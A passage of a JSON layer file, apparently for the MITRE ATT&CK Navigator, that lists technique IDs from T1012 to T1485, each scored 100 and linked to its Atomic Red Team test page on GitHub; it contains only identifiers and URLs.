Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1037.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1056.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1090.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1125","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View 